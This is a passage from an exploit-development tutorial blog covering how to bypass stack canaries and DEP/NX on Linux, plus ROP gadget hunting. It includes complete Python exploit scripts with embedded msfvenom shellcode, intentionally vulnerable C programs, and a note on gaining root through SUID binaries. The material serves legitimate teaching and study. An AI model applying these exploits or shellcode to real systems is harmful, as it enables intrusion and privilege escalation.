0xNinjaCyclone Blog

Penetration tester and Red teamer


[Exploit development] 0A- Dancing with Memory Guards: Breaking Canaries/Cookies, DEP/NX, and ASLR

Intro

In the previous post, we discussed stack-based buffer overflow vulnerabilities in depth from several aspects, such as the methods used to discover this type of vulnerability. We also touched on fuzzing and how we can benefit from it. We also talked about strategies for exploiting this type of vulnerability based on the nature of the targeted program and its working mechanisms. We also discussed methods of protection and defense against this type of vulnerability, and we explained some common mistakes that may lead to bypassing these defenses. You must read it to understand this post, as we will build on what was mentioned there.

One of the things we explained was hijacking the execution flow by overwriting the instruction pointer and forging it with another pointer that references our own instructions. In this way, we would force the program to execute arbitrary code of our own. Unfortunately, life isn’t that easy, as there are many powerful protections and mitigations that prevent us from doing this so simply.

But don’t worry, my friend. I don’t deny the power and effectiveness of these protections, especially when combined, making exploitation more difficult and complex. However, if we fully understand how these protections work and the keys of the targeted program, we can circumvent them and bypass them with creative tricks.

The F*ckin Mousetrap ( Cookies / Canaries )

This type of memory protection is exactly like a mousetrap. When your home has some openings that allow mice to enter and mess around, one solution you might take is to set traps to reduce the danger of these mice by luring them with some cheese. As soon as they fall into the trap, you get rid of them, which reduces their greater danger to vital things in the home. However, there are clever mice that can detect the trick, avoid the trap, and continue with their mission. That is where the philosophy of cookie/canary protection came from, and we will follow up on this same philosophy as mice to bypass them and not fall into the trap.

https://www.wibu.com/pl/magazine/keynote-articles/article/detail/traps-against-hacker.html

A canary/cookie is a random value generated by the program when it starts executing. Each time the program runs, it generates a unique value. This value is placed at the end of each stack frame in a subsequent location for the data and variables of the function. When the function corresponding to that frame gets called and completes execution before returning, it checks the previously generated value. If it has been hit, i.e., the value has changed, this indicates an overflow. Accordingly, the function does not return, and the program closes completely. That thwarts any exploit that attempts to overwrite the instruction pointer and redirect the program execution flow.

Analyzing Security Canaries/Cookies

Let’s take the following code as an example:

#include <stdio.h>

void main() {
  char cName[16];
  scanf("%s", cName);
  puts( cName );
}

And compile it as follows:

┌──(user㉿host)-[~]
└─$ gcc test.c -o test

Then we disassemble the main function and find the following instructions:

0000000000001149 <main>:
    1149:       55                      push   rbp
    114a:       48 89 e5                mov    rbp,rsp
    114d:       48 83 ec 10             sub    rsp,0x10
    1151:       48 8d 45 f0             lea    rax,[rbp-0x10]
    1155:       48 89 c6                mov    rsi,rax
    1158:       48 8d 05 a5 0e 00 00    lea    rax,[rip+0xea5]        # 2004 <_IO_stdin_used+0x4>
    115f:       48 89 c7                mov    rdi,rax
    1162:       b8 00 00 00 00          mov    eax,0x0
    1167:       e8 d4 fe ff ff          call   1040 <__isoc99_scanf@plt>
    116c:       48 8d 45 f0             lea    rax,[rbp-0x10]
    1170:       48 89 c7                mov    rdi,rax
    1173:       e8 b8 fe ff ff          call   1030 <puts@plt>
    1178:       90                      nop
    1179:       c9                      leave
    117a:       c3                      ret

This is roughly the familiar format of the instructions we’ve seen in previous posts. But let me show you how it will look when we ask the compiler to integrate canary/cookie protection.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector test.c -o test
                    

Focus on this picture carefully and compare the result of this dissemble with the previous one.

Eight bytes are loaded from the F Segment register at the main function prologue and pushed onto the stack above the saved base pointer (RBP-0x8). While in the epilogue, the original canary/cookie is compared to that on the stack. The comparison is performed as follows:

  1. The canary/cookie previously pushed onto the stack gets loaded into the accumulator register (RAX)
  2. The canary/cookie value gets subtracted from the original one in the F Segment register.
  3. If both are the same, the Zero Flag gets triggered, allowing execution to be redirected to the ret instruction.
  4. Otherwise, the execution is redirected to a function called __stack_chk_fail that displays a fatal error message and terminates the process.

Once passing a large input, the program execution gets hijacked by the __stack_chk_fail function, which displays an error on the screen telling us that stack smashing occurred, and the program gets killed by the __pthread_kill_implementation function.

The stack layout is exactly like follows:

        *--------------------------* <-- Frame data & Buffers
        |                          |
        |                          |
        |                          |
-0x8 -> *--------------------------* <-- Canary / Cookie
        |                          |
+0x0 -> *--------------------------* <-- Saved RBP ( Base Pointer )
        |                          |
+0x8 -> *--------------------------* <-- Saved RIP ( Instruction Pointer )
        |                          |      
        *--------------------------*

It’s really a big challenge because the canary is placed in a critical location, where we have to overwrite it to get into vital stuff like the instruction pointer.

Leaking it out Leads to Winning!

One strategy to defeat canaries/cookies is to leak them first, then craft a payload containing the leaked canary, causing the comparison to fail because the canary in the stack after the attack is still the same as the original canary. Let’s take an example:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char data[256];
    char *cpReadData;
    int nSize;
} Buffer;

Buffer buf_new() {
    return (Buffer) { 0x00 };
}

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize ) 
        pBuf->data[ pBuf->nSize-1 ] = ' ';

    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
}

void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;

    printf( pBuf->cpReadData );
    pBuf->cpReadData += pBuf->nSize;
}

void buf_readall(Buffer *pBuf) {
    printf( pBuf->data );
}

void main() {
    Buffer buf = buf_new();
    int nChoice, c;

    for ( ;; ) {
        printf( "\n\n1- Write\n2- Read\n3- Read full data\n4- Exit\n\nChoose: " );
        scanf( "%d", &nChoice );

        // Clearing the buffer so nothing breaks `getdelim` later ;)
        while ( (c = getchar()) != 0x0a && c != EOF ); 
        
        if ( nChoice == 1 ) {
            char *cpLine = NULL;
            size_t n = 0;
            printf( "Data: " );
            n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
            if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
                buf_write( &buf, cpLine, n );
            free( cpLine );
        }

        else if ( nChoice == 2 )
            buf_read( &buf );

        else if ( nChoice == 3 )
            buf_readall( &buf );

        else if ( nChoice == 4 )
            break;
        
        else 
            puts( "[-] Invalid choice!" );
    }
}

This is a simple program that allows users to write and read data interactively. Let’s compile and run it with the canary protection enabled:

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test


1- Write
2- Read
3- Read full data
4- Exit

Choose: 1
Data: Hello Guys


1- Write
2- Read
3- Read full data
4- Exit

Choose: 2
Hello Guys


1- Write
2- Read
3- Read full data
4- Exit

Choose: 1
Data: I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 2
I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 3
Hello Guys I'm 0xNinjaCyclone


1- Write
2- Read
3- Read full data
4- Exit

Choose: 4
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ 

If you pay attention to the read functions, you will find that they are both vulnerable to the format string vulnerability, where user-controled data is passed to the printf function as a format, not in a safe way. The buf_read function is also vulnerable to the buffer over-read vulnerability, as the pBuf->cpReadData pointer prints what it points to and moves to the memory after what it has read without ever checking whether the memory it moved to belongs to the buffer it is supposed to read from or not. Exploiting any one of which those two bugs, would allow us to leak the secret canary/cookie.

As you can see, we can exploit the format string bug to leak the canary by injecting %49$p as a payload via the write function and leaking it out by leveraging the read function. Read the format string exploitation post to understand what we did. We can automate this using Python as follows:

def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break

        n += 1

    else:
        return -1

    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary

This function takes a handler object to the target process, injects the payload, leaks the canary, and then returns the canary to the caller after converting it to an integer value or returning -1 on failure.

Now, we can craft a payload that overwrites the canary with the correct value, injects a shellcode, and redirects the execution flow by overwriting the instruction pointer.

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

We followed the same approach we discussed in the buffer overflow post, filling the frame with junk data with the canary in place to bypass the protection, injecting the shellcode into the previous frame, and replacing the instruction pointer to reference the shellcode. However, for the shellcode to execute, the main function must return. We can do this using the fourth function (exit), which breaks the loop and allows the main function to return.

def exit_target(p: Popen):
    p.stdin.write( b"4\n" )

This function must be called after injection to force the program to execute shellcode.

def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )

    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )

    canary = leak_canary( p )
    
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )

In the main function, we start the target process with the stdbuf -o0 command so that we can read the output efficiently while it is running, even if the process doesn’t flush the output pipes. We also force the operating system not to block the output pipes so that we don’t get stuck and deadlock occurs. Next, we leak the canary. If we succeed, the process will be injected and the execution flow will be redirected after triggering that using the exit function. If we fail, the program exits.

Let’s run the exploit:

Great, we could bypass the stack canary and execute a shellcode that runs the ‘id’ command. If the program is owned by the root and has SUID permission, we can gain root privileges as we have seen in the previous blog post.

Here is the full exploitation code:

#!/usr/bin/python3

import struct, os, fcntl
from subprocess import Popen, PIPE

TARGET_PATH = "./test"

# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true CMD="id"
buf =  b""
buf += b"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50"
buf += b"\x54\x5f\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x03"
buf += b"\x00\x00\x00\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
buf += b"\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05"

def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break

        n += 1

    else:
        return -1

    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

def exit_target(p: Popen):
    p.stdin.write( b"4\n" )

def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )

    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )

    canary = leak_canary( p )
    
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )

if __name__ == '__main__':
    main()

Therefore, the reading functions must be modified as follows to prevent such a leak from occurring:

#include <stdbool.h>
bool g_bCanRead = false;

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize ) 
        pBuf->data[ pBuf->nSize-1 ] = ' ';

    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
    g_bCanRead = true;
}

void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;

    if ( !g_bCanRead ) {
        fputs( "[-] Cannot Read", stderr );
        return;
    }

    printf( "%s", pBuf->cpReadData );
    pBuf->cpReadData += pBuf->nSize;
    g_bCanRead = false;
}

void buf_readall(Buffer *pBuf) {
    printf( "%s", pBuf->data );
}

This modification fixes the memory disclosure vulnerabilities in the program by using the printf function in a safe way instead of passing the user input directly as a format and also placing restrictions on the buf_read function to prevent over-reading the buffer.

┌──(user㉿host)-[~]
└─$ python3 exploit.py                              
[-] Failed to leak the canary   

The exploit we developed is no longer effective. Fixing memory disclosure bugs had broken it, as it relied primarily on exploiting one of them in the exploitation chain.

Don’t Worry We Still Can Leak It Without Additional Bugs

Having a vulnerability that allows data to be leaked from memory can be very helpful, but this doesn’t always happen. In such cases, the alternative solution is to use the same buffer overflow vulnerability you have in an attempt to leak secret and sensitive data from memory. Let’s review the stack layout. It looks like this:

0x00 -> *--------------------------* <-- Injection Point
        |                          |
        |                          |
        |                          |
        |                          |
        |                          |
        |                          |
0x100-> *--------------------------* <-- Buffer->cpReadData
        |                          |
0x108-> *--------------------------* <-- Buffer->nSize
        |                          |
0x110-> *--------------------------* <-- Junk data
        |                          |      
0x118-> *--------------------------* <-- Canary / Cookie
        |                          |      
0x120-> *--------------------------* <-- Saved RBP ( Base Pointer )
        |                          |      
0x128-> *--------------------------* <-- Saved RIP ( Instruction Pointer )
        |                          |      
        *--------------------------*

Don’t you notice something? The Buffer->cpReadData pointer used to read memory is under our control. We can forge that address and make it point to any other location we want in memory and leak its content. Our plan will go as follows:

  1. Filling the buffer until getting into the targeted pointer using the write function.
  2. Overwriting the Buffer->cpReadData with the canary address.
  3. Leaking out the canary by triggering the read function.
  4. Triggering the write function again to overwrite the remaining data with a crafted payload.
  5. Triggering shellcode execution by leveraging the exit function that allows the main to return.
(gdb) c
Continuing.

Breakpoint 1, 0x00005555555553cf in main ()
(gdb) x/a $rbp-8
0x7fffffffdd48: 0xe1125f7dcee84f00

I attached gdb to the target process and put a breakpoint at the main function. After examining the canary, I found that it lives at 0x7fffffffdd48 in memory. However, there is a problem here: the canary always contains a null byte at its lowest order (Least Significant Byte). Therefore, we have to read from that address plus one so the null byte doesn’t stop us, and we can obtain seven bytes from leaked data and append the null ourselves.

def leak_canary(p: Popen):
    payload = b""
    payload += b"A" * 0x100                         # Filling the stack frame
    payload += struct.pack( "<Q", 0x7fffffffdd49 )  # Buffer->cpReadData
    payload += (b"\x00" * 0x8)                      # Buffer->nSize ( To avoid touching it )

    p.stdin.write( b"1\n" + payload + b"\n2\n" )
    p.stdin.flush()

    out = b""
    canary_pos = -1
    n = 0
    
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"Choose: " )
        if bool( ~canary_pos ) and canary_pos+15 < len(out):
            canary_pos += 8
            break

        n += 1

    else:
        return -1

    canary = struct.unpack( "<Q", b"\x00" + out[canary_pos : canary_pos+7] )[ 0 ]
    return canary

This function does what we discussed earlier: it leaks the canary data, attempts to parse it into an integer value, and then returns it to the caller. Things are going well, so we just need to make a few changes to the hijack_exec function, and everything will be in order.

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x7                                 # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

We changed almost nothing except the first line, as the leak_canary function will fill most of the stack frame, leaving only a little space on the stack that we need to overflow to get into vital stuff.

Bingo, our plan worked.

Jumping Over The Sh1t

Not all programs are designed to operate interactively. Many take input from the user and perform their tasks directly in one fell swoop. In this case, we cannot leak the canary, whether using a vulnerability or other techniques and then complete the attack by using the overflowing vulnerability to hijack the program’s execution. In such cases, we need a creative way to defeat this protection with one shot. This isn’t easy and depends mainly on the logic of the targeted program and how it works. Let us take an example:

#include <stdio.h>
#include <stdlib.h>

typedef struct {
    char data[64];
    int nSize;
} Buffer;

Buffer buf_new() {
    return (Buffer) { 0x00 };
}

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    while ( n-- )
        pBuf->data[ pBuf->nSize++ ] = *cpData++;
}
void buf_read(Buffer *pBuf) {
    printf( "%s", pBuf->data );
};

void main() {
    Buffer buf = buf_new();
    char *cpLine = NULL;
    size_t n = 0;

    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );

    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf_write( &buf, cpLine, n );

    puts( "Your Data :" );
    buf_read( &buf );
}

This example is similar to the previous one. There’s nothing new in it except that it doesn’t work interactively. It reads from the user and prints the user’s input to the screen.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test                                          
Data: Hello Guys, I'm 0xNinjaCyclone.
Your Data :
Hello Guys, I'm 0xNinjaCyclone.

Focus well on this line:

        pBuf->data[ pBuf->nSize++ ] = *cpData++;

It looks like a normal code that copies data from one memory to another byte by byte. But it’s not, my friend. We can abuse it in a very sinister way to jump over the canary without damaging it. Let me explain it to you more so you understand what I mean. It performs a buffer dereference based on the pBuf->nSize value, copies to that location one byte from memory pointed to by the cpData pointer, and increments those values ​​by one so that it can move the next byte in the next iteration, and continues doing that in a loop until all the data has been moved.

This variable, which tells the program where to write data, is under our control. However, we can’t effectively change it completely. We can only change the byte in the lowest order because changing that byte completely changes the location we’re writing to. This is enough to defeat the protection. We can make the write jump to write directly to the instruction pointer without having to write sequentially and destroy the canary.

#!/usr/bin/python3

import struct

with open("payload", "wb") as f:
    f.write( b"A" * 64 )                          # Fills the Buffer 
    f.write( b"\x58" )                            # ( (unsigned char *) &Buffer->nSize )[0] ( LSB )
    f.write( struct.pack("<Q", 0x7fffffffdd70) )  # Instruction Pointer
    f.write( b"\x90" * 0x40 )                     # Own Code ( NOPs )

Let’s try this exploit and see if it will succeed in jumping over the canary or not.

As you can see, We’ve successfully defeated the canary and overwritten the instruction pointer, allowing us to hijack the program’s execution flow.

PreEmpting The Canary/Cookie Protection

One way to bypass this type of protection is if we have the ability to hijack the flow of program execution in ways other than modifying the instruction pointer before the validation of the canary value occurs, we can bypass it even if the canary value is destroyed. There are many scenarios that allow us to hijack the execution flow:

  1. Functions Pointers: If we can control one of the function pointers and it gets called before the canary check occurs, we can bypass that protection.

  2. V-Table: It’s really a magic. It’s a table that holds the methods pointer of a specific object for supporting polymorphism in the C++ language so each object can know exactly its corresponding methods without any conflict with its parent’s methods. If we could control that table, we could leverage any of its methods to execute our own code without being detected by the canary protection.

  3. Windows SEH: SEH stands for Structured Exception Handling, a feature developed by Microsoft for the C/C++ languages used to handle specific exception code cases (such as hardware failures for example). These handlers are located primarily in the stack. If we can trigger an exception from them, we can leverage them to get code execution (before the canary validation).

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

typedef struct _Buffer {
    char data[64];
    int nSize;
    void (*write)(struct _Buffer *, char *, size_t);
    void (*read)(struct _Buffer *);
} Buffer;

void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    memcpy( pBuf->data, cpData, n );
    pBuf->nSize += (int) n;
}

void buf_read(Buffer *pBuf) {
    puts( "Your Data :" );
    printf( "%s", pBuf->data );
};

Buffer buf_new(bool bShouldRead) {
    return (Buffer) {
        .data = { 0 },
        .nSize = 0,
        .write = buf_write,
        .read = ( bShouldRead ) ? buf_read : NULL
    };
}

void main(int argc, char **argv) {
    Buffer buf = buf_new( (bool)(argc > 1 && strcmp(argv[1], "-r") == 0) );
    char *cpLine = NULL;
    size_t n = 0;

    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );

    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf.write( &buf, cpLine, n );

    if ( buf.read )
        buf.read( &buf );
}

This example is very similar to the previous one, except that in this the Buffer structure has additional members that hold pointers to its associated functions, and during initialization in the buf_new function, the addresses of those functions are assigned to the structure instance.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test -r
Data: Hello World!
Your Data :
Hello World!

Notice that the read function pointer is under our control, which we can trigger using the -r option. This function will be called before the canary check, allowing us to preempt the protection, hijack the program execution flow, and execute our own code.

As we said before, The function pointer we control gets called before the canary. We can abuse it by making it call our shellcode.

#!/usr/bin/python3

import struct

# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true PrependSetuid=true PrependSetgid=true CMD=id
buf =  b""
buf += b"\x48\x31\xff\x6a\x69\x58\x0f\x05\x48\x31\xff\x6a"
buf += b"\x6a\x58\x0f\x05\x48\xb8\x2f\x62\x69\x6e\x2f\x73"
buf += b"\x68\x00\x99\x50\x54\x5f\x52\x66\x68\x2d\x63\x54"
buf += b"\x5e\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x56\x57"
buf += b"\x54\x5e\x6a\x3b\x58\x0f\x05\x48\x31\xff\x6a\x3c"
buf += b"\x58\x0f\x05"

with open("payload", "wb") as f:
    f.write( b"A" * 80 )                                 # Fills the Buffer 
    f.write( struct.pack("<Q", 0x7fffffffdd70 + 0x40) )  # Function Pointer
    f.write( b"\x90" * 0x80 )                            # NOPs for padding
    f.write( buf )                                       # Shellcode

Okay, everything is in order, let’s shoot.

Other Strategies

Not all operating systems and compilers are created equal, and not all canary protection implementations are the same. Sometimes, they may be weak and improperly implemented, allowing them to be bypassed. Here are some of the shortcomings and how they can be exploited to bypass them:

  1. Static Canary/Cookie: Sometimes, the value of the secret canary is fixed and does not change with each run of the program. In this case, this value can be placed in its place. When it is verified at the end of the function, the condition will be met, and the protection will be broken.

  2. Weak Canary/Cookie: Sometimes, the value of the secret canary changes, but not completely. Only a small fraction of it changes each time the program runs. In this case, we can guess the canary value and then force the program to run several times until we encounter the correct value.

  3. Not All Buffers Are Protected: Compilers usually put this protection on functions that have Bytes/String Buffer. Here, another exploit opportunity arises when the vulnerable code does not contain any of those buffer types.

  4. Overwritable Canary/Cookie: In Windows, for example, this value lives somewhere in the PE image’s memory. If we have the ability to write to anything in memory, we can change it to a value we know. For example, this mov qword ptr[RegisterA], RegisterB instruction copies data from register B to the memory that is referenced by register A. If we can control these registers, we can replace the original canary.

DEP / NX == No More Direct Code Execution

In this and previous articles, we’ve always relied on hijacking the flow of program execution by injecting malicious code onto the stack and forcing the program to execute. This protection is specifically designed to prevent this. If an exploit bypasses the canary and gains control of the instruction pointer, the injected code will not be executed. Once the processor begins executing these instructions from the stack, it will trigger an interrupt, informing the operating system that something abnormal has occurred. The system will raise an access violation exception and then terminate the process.

DEP is stands for Data Execution Prevention, it’s mainly works in two mode:

  1. Hardware Level Support: hardware-enforced DEP for CPUs that can mark memory pages as Non-eXecutable (NX bit). In this mode, the processor itself can prevent the execution of any code from memory pages that are not supposed to be executed.

  2. Software Level Support: Software-enforced DEP is an alternative for CPUs that do not have hardware support. In this mode, the operating system intervenes itself to implement this layer of protection.

This feature is set through the boot configurations where your DEP application is set to launch at system boot in accordance with the No-eXecute (NX) page protection policy setting within the boot configuration data, and depending on the policy setting, a specific application may change the DEP setting for this process. There is also more than one mode:

  1. Opt-In: DEP is only enabled for core system images and those specified in the DEP configuration. enables DEP only for operating system components, including the Windows kernel and drivers. Also, pre-selected programs by administrators.

  2. Opt-Out: DEP is enabled for all programs and services except those in the exception list. If a particular program is not in the exceptions list, then DEP is enabled for that program.

  3. AlwaysOn: In this mode, DEP is enabled for all processes without any exceptions and cannot be turned off at runtime.

  4. AlwaysOff: This mode is the opposite of AlwaysOn, as DEP is disabled for all processes and cannot be turned on at runtime.

Each executable binary file contains information about each section and the permissions it requires, such as read, write, and execute permissions. In Windows PE files, for example, _IMAGE_SECTION_HEADER.Characteristics represents the permissions a section requires in memory. If the IMAGE_SCN_MEM_EXECUTE flag has been set, the operating system is forced to disable the “Non-eXecute” bit for those memory pages. The same is true for ELF files, where ElfN_Shdr.sh_flags represents the permissions for each section. If the SHF_EXECINSTR flag has been set, the data in that section is executable.

When we build code, the compiler and linker assign each section the permissions it needs when loaded into memory. Therefore, we use the -zexecstack option to force the compiler to mark the stack and the data it contains as executable. When the operating system loads a binary file into memory, it marks stack memory pages as executable space. But, by default, the stack’s permissions are read and write, not execution.

Return Oriented Programming ( ROP )

Yes, we cannot redirect execution to the stack because this protection will prevent us, but we can still redirect execution to executable memory, for example, the executable section of the program itself and the libraries and modules loaded in the process address space. Let me explain more to you.

Any computer program works as follows: It executes a set of instructions sequentially, and when it encounters a return instruction, it extracts the instruction pointer previously stored in the stack and moves to execute the instructions in the memory that that pointer is referred to, and when it encounters a return instruction, it does so again until finish.

We can exploit this by controlling the instruction pointer and its location, making the program jump to execute one or more instructions followed by a return instruction (ROP Gadget). When the return instruction is executed and the instruction pointer is retrieved again, it finds a fake address pointing to another instruction or instructions followed by a return instruction. We continue doing this as a chain until we achieve a satisfactory result.

A ROP gadget can be defined as one or more instructions followed by a return instruction located somewhere in a library, module, or executable section of the program itself. It can be used in sequence with other ROP gadgets to achieve a specific goal; this is called a ROP chain.

We can hunt for needed ROP gadgets using many tools, one of them is an amazing tool called Ropper, which provides us with many features that we need in return-oriented programming. For example, if we want to hunt for ROP gadgets in libc:

┌──(user㉿host)-[~]
└─$ ropper
(ropper)> file /usr/lib/x86_64-linux-gnu/libc.so.6
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(libc.so.6/ELF/x86_64)> 

We will run the tool and load the executable file using the file command as shown.

We can extract all ROP gadgets in that file using the gadget command, as shown in the picture above. We can also easily hunt for specific gadgets using the “search” command:

(libc.so.6/ELF/x86_64)> search pop rdi
[INFO] Searching for gadgets: pop rdi

[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x0000000000059c05: pop rdi; adc eax, 0xe762e800; std; jmp qword ptr [rsi - 0x70]; 
0x000000000017cd88: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rdi], ah; ret; 
0x0000000000179ec8: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rsi], ah; ret; 
0x00000000000d7a01: pop rdi; add byte ptr [rax], al; add byte ptr [rdi + rcx + 0x45], al; fsubr st(1); ret 0xfff0; 
0x000000000011e7a2: pop rdi; add ebx, ebp; lahf; xor eax, eax; ret; 
0x000000000016b267: pop rdi; add rax, rdi; shr rax, 2; vzeroupper; ret; 
0x0000000000165b47: pop rdi; add rax, rdi; vzeroupper; ret; 
0x000000000016c935: pop rdi; add rdi, 0x21; add rax, rdi; vzeroupper; ret; 
0x000000000011072d: pop rdi; call rax; 
0x000000000011072d: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall; 
0x00000000000f43ad: pop rdi; cmp eax, 0x8948fff3; ret 0x448b; 
0x000000000016a927: pop rdi; cmp esi, dword ptr [rdi + rax]; jne 0x16a934; add rax, rdi; vzeroupper; ret; 
0x00000000001671db: pop rdi; cmp sil, byte ptr [rdi + rax]; jne 0x1671e9; add rax, rdi; vzeroupper; ret; 
0x000000000002d13c: pop rdi; jmp rax; 
0x0000000000054968: pop rdi; mov dword ptr [rdi], 0; mov eax, 2; ret; 
0x00000000000f9a10: pop rdi; mov eax, 0x3a; syscall; 
0x0000000000100a1a: pop rdi; or al, ch; iretd; jns 0x100a12; jmp qword ptr [rsi - 0x7d]; 
0x0000000000100b60: pop rdi; or byte ptr [rax - 0x77], cl; pop rbp; add al, ch; test dword ptr [rax - 0xe], edi; jmp qword ptr [rsi - 0x7d]; 
0x0000000000110e0c: pop rdi; or eax, 0x64d8f700; mov dword ptr [rdx], eax; mov eax, 0xffffffff; ret; 
0x00000000001420d2: pop rdi; out dx, al; dec dword ptr [rax - 0x77]; ret 0x8548; 
0x000000000002a3fc: pop rdi; pop rbp; ret; 
0x000000000015e700: pop rdi; cli; dec dword ptr [rax - 0x39]; ret 0xffff; 
0x000000000002a205: pop rdi; ret;

The tool has collected all the gadgets related to the instruction we are looking for (pop rdi). We can also make the search more general.

(libc.so.6/ELF/x86_64)> search mov [rbx + 0x40],%
[INFO] Searching for gadgets: mov [rbx + 0x40],%

[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x00000000000a3bcf: mov dword ptr [rbx + 0x40], eax; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;                                                                                                                                    
0x00000000001161f5: mov dword ptr [rbx + 0x40], eax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret; 
0x000000000003fa47: mov dword ptr [rbx + 0x40], esi; pop rbx; ret; 
0x000000000003fa28: mov dword ptr [rbx + 0x40], esi; xor eax, eax; pop rbx; ret; 
0x000000000008ba03: mov dword ptr [rbx + 0x40], esp; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret; 
0x000000000008be8e: mov dword ptr [rbx + 0x40], esp; pop rbx; pop rbp; pop r12; ret; 
0x000000000008ba02: mov qword ptr [rbx + 0x40], r12; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret; 
